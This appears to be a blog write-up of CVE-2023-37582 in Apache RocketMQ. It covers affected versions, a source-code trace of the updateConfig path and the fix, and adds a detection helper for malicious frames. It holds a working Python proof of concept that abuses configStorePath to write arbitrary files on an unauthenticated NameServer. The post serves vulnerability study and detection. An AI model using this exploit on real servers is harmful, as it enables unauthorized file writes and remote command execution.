CVE-2023-37582 Apache RocketMQ Remote Code Execution Vulnerability


Vulnerability Profile

Apache RocketMQ is a distributed message middleware offering low latency, high concurrency, high availability and high reliability. In CVE-2023-37582, because the fix for CVE-2023-33246 was incomplete, an attacker who can reach the Apache RocketMQ NameServer without authentication can construct a malicious request to execute commands as the system user running RocketMQ.

Affected version

Apache RocketMQ <= 5.1.1
Apache RocketMQ <= 4.9.6

Environment build

Refer to the environment setup in Apache RocketMQ Remote Code Execution Vulnerability CVE-2023-33246.

As before, for ease of debugging, we build the RocketMQ services on Linux and start them from source.

Two services need to be running:

org.apache.rocketmq.namesrv.NamesrvStartup
org.apache.rocketmq.broker.BrokerStartup

Start NamesrvStartup first, then BrokerStartup; the environment variable ROCKETMQ_HOME must be set, for example:

ROCKETMQ_HOME=/home/ubuntu/Desktop/rocketmq-rocketmq-all-5.1.0


Vulnerability reproduction

Run the following Python script:

import socket
import struct

client = socket.socket()

# NameServer address: replace with your own host IP
client.connect(('192.168.222.130', 9876))

# Remoting header: request code 318 (update NameServer config), JSON-serialized
header = '{"code":318,"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')
# Body: properties to update; configStorePath redirects where the config file is persisted
body = 'configStorePath=/tmp/test.txt\nproductEnvName=123\\ntest'.encode('utf-8')

# Frame layout: 4-byte total length (= 4 + header length + body length),
# then 4-byte header length (high byte 0 = JSON serialization), header JSON, body.
# Both length fields are big-endian, which is what the hex padding in the original did.
total_len = 4 + len(header) + len(body)
data = struct.pack('>II', total_len, len(header)) + header + body

# send the frame and read the response
client.sendall(data)
data_recv = client.recv(1024)
print(data_recv)
client.close()

The request writes the specified string test into the file test.txt under the /tmp directory.

Vulnerability Analysis

Each request code defined in org/apache/rocketmq/remoting/protocol/RequestCode.java maps to a different handler; code 318 used here is the update-configuration operation.

src/main/java/org/apache/rocketmq/remoting/protocol/RequestCode.java


DefaultRequestProcessor dispatches on the request code and calls the corresponding handler for processing.

src/main/java/org/apache/rocketmq/namesrv/processor/DefaultRequestProcessor.java


src/main/java/org/apache/rocketmq/namesrv/processor/DefaultRequestProcessor.java#updateConfig


src/main/java/org/apache/rocketmq/remoting/Configuration.java#update


update first checks whether the submitted property is one it is allowed to control.

src/main/java/org/apache/rocketmq/remoting/Configuration.java#persist


src/main/java/org/apache/rocketmq/remoting/Configuration.java#getStorePath


persist calls getStorePath to obtain the file path, and the value returned at this point is the configStorePath value supplied in the request.

src/main/java/org/apache/rocketmq/common/MixAll.java#string2File


src/main/java/org/apache/rocketmq/common/MixAll.java#string2FileNotSafe


src/main/java/org/apache/rocketmq/common/utils/IOTinyUtils.java#writeStringToFile

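The following is an added example, not code from the original post or from the RocketMQ project. It decodes remoting frames using the layout the reproduction script builds (total length, header length, JSON header, body) and flags an updateConfig request (code 318) whose body sets configStorePath, the sink traced above; the helper names, the PATH_KEYS set and the sample frames are my own constructions.

```python
import json
import struct

# Request code for "update NameServer config" (RequestCode.java, as shown above).
UPDATE_NAMESRV_CONFIG = 318
# Property keys that redirect where the config is persisted (the sink in this CVE).
PATH_KEYS = {"configStorePath"}

def build_frame(header: dict, body: bytes) -> bytes:
    """Encode a remoting frame: total length, header length (JSON), header, body."""
    header_bytes = json.dumps(header, separators=(",", ":")).encode("utf-8")
    total_len = 4 + len(header_bytes) + len(body)
    # high byte of the second field is the serialize type; 0 means JSON header
    return struct.pack(">II", total_len, len(header_bytes)) + header_bytes + body

def parse_frame(frame: bytes):
    """Decode one frame into (header dict, body bytes); ValueError if malformed."""
    if len(frame) < 8:
        raise ValueError("frame shorter than the two length fields")
    total_len, header_field = struct.unpack(">II", frame[:8])
    serialize_type, header_len = header_field >> 24, header_field & 0xFFFFFF
    if serialize_type != 0:
        raise ValueError("only JSON-serialized headers are handled here")
    if 4 + total_len > len(frame) or 4 + header_len > total_len:
        raise ValueError("length fields do not match the captured bytes")
    header = json.loads(frame[8:8 + header_len].decode("utf-8"))
    return header, frame[8 + header_len:4 + total_len]

def parse_properties(body: bytes) -> dict:
    """Parse the key=value lines an updateConfig request carries in its body."""
    props = {}
    for line in body.decode("utf-8", errors="replace").splitlines():
        if "=" in line and not line.lstrip().startswith("#"):
            key, value = line.split("=", 1)
            props[key.strip()] = value.strip()
    return props

def flag_config_path_tamper(frame: bytes) -> list:
    """Return the path keys set if the frame is an updateConfig rewriting the store path."""
    header, body = parse_frame(frame)
    if header.get("code") != UPDATE_NAMESRV_CONFIG:
        return []
    return sorted(k for k in parse_properties(body) if k in PATH_KEYS)

# Constructed sample frames (not captured traffic): one tampering request, one benign one.
HDR = {"code": 318, "flag": 0, "language": "JAVA", "opaque": 266,
       "serializeTypeCurrentRPC": "JSON", "version": 433}
TAMPER_FRAME = build_frame(HDR, b"configStorePath=/tmp/test.txt\nproductEnvName=123")
BENIGN_FRAME = build_frame(HDR, b"productEnvName=prod")
```

Feeding frames captured on port 9876 through flag_config_path_tamper gives a simple network-side check for this request pattern; an empty list means the frame either is not an updateConfig or does not touch the store path.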

Bug fixes

The fix rejects update requests that attempt to modify the configuration store path parameter.



Origin blog.csdn.net/qq_38154820/article/details/132033601